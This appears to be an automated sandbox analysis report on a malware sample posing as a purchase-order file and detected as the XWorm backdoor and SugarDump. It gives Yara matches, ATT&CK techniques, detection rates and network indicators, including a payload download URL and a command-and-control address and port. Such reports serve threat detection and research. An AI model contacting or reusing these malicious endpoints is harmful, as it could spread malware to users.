Source: Yara match	File source: 3.2.RegSvcs.exe.7ab0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.7ab0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1992384164.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6648, type: MEMORYSTR

Yara detected SugarDump

Source: Yara match	File source: 3.2.RegSvcs.exe.7cf0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.7cf0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1995905979.0000000007CF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6648, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1646069064.000001E853C1F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1940827360.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1948750396.0000000002961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1646490262.000001E856E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORDERDATASHEET#PO8738763.scr.exe PID: 3272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6648, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	331 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 File and Directory Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	312 Process Injection	31 Obfuscated Files or Information	Security Account Manager	146 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	641 Security Software Discovery	Distributed Component Object Model	21 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	211 Masquerading	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	351 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ORDERDATASHEET#PO8738763.scr.exe	39%	ReversingLabs	Win64.Backdoor.Xworm
ORDERDATASHEET#PO8738763.scr.exe	21%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\XClient.exe	0%	ReversingLabs
C:\Users\user\ORDERDATASHEET#PO8738763.scr.exe	39%	ReversingLabs	Win64.Backdoor.Xworm

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
csg-app.com	7%	Virustotal	Browse
api.ipify.org	1%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse
s82.gocheapweb.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://tempuri.org/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	0%	Avira URL Cloud	safe
https://api.ipify.org/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/actor/next	0%	URL Reputation	safe
http://ip-api.com/line/?fields=hosting	0%	URL Reputation	safe
http://tempuri.org/Entity/Id23ResponseD	0%	Avira URL Cloud	safe
http://crl.microsoft	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id23ResponseD	1%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://tempuri.org/Entity/Id2Response	2%	Virustotal		Browse
http://crl.microsoft	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	0%	Virustotal		Browse
http://tempuri.org/Entity/Id12Response	2%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	0%	Virustotal		Browse
http://tempuri.org/Entity/Id12Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2Response	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id21Response	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id21Response	4%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	0%	Virustotal		Browse
https://aka.ms/nativeaot-compatibility	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wsat	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id15Response	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	0%	Avira URL Cloud	safe
https://aka.ms/nativeaot-compatibility	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wsat	0%	Virustotal		Browse
http://tempuri.org/Entity/Id1ResponseD	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	0%	Virustotal		Browse
http://tempuri.org/Entity/Id15Response	2%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	0%	Avira URL Cloud	safe
https://aka.ms/nativeaot-compatibilityy	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id1ResponseD	1%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	0%	Virustotal		Browse
http://tempuri.org/Entity/Id24Response	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	0%	Avira URL Cloud	safe
https://aka.ms/nativeaot-compatibilityy	0%	Virustotal		Browse
http://tempuri.org/Entity/Id24Response	1%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5Response	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id10Response	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id8Response	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	0%	Virustotal		Browse
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	0%	Avira URL Cloud	safe
https://aka.ms/nativeaot-c	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	1%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
csg-app.com	107.154.156.233	true	false	7%, Virustotal, Browse	unknown
api.ipify.org	104.26.13.205	true	false	1%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown
s82.gocheapweb.com	51.195.88.199	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://csg-app.com/yak/build.exe	true	Avira URL Cloud: safe	unknown
https://api.ipify.org/	false	URL Reputation: safe	unknown
http://ip-api.com/line/?fields=hosting	false	URL Reputation: safe	unknown
209.90.234.57:1913	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id23ResponseD	RegSvcs.exe, 00000003.00000002.1948750396.0000000002B76000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.microsoft	powershell.exe, 00000009.00000002.1771055969.0000000007CA2000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id12Response	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id21Response	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibility	ORDERDATASHEET#PO8738763.scr.exe, 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.1696914668.0000000005E6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725374615.0000000005FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1762039748.000000000542A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1808922395.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id15Response	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.1948750396.0000000002961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1694419298.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1717816114.0000000004F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1750061142.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789776531.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ip.sb/ip	RegSvcs.exe, 00000003.00000002.1992384164.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000B.00000002.1789776531.0000000004C36000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000B.00000002.1789776531.0000000004C36000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id1ResponseD	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibilityy	ORDERDATASHEET#PO8738763.scr.exe, ORDERDATASHEET#PO8738763.scr.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000B.00000002.1808922395.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id24Response	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000B.00000002.1789776531.0000000004C36000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.1694419298.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1717816114.00000000050E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1750061142.0000000004516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789776531.0000000004C36000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/nativeaot-compatibilityY	ORDERDATASHEET#PO8738763.scr.exe, ORDERDATASHEET#PO8738763.scr.exe.0.dr	false		unknown
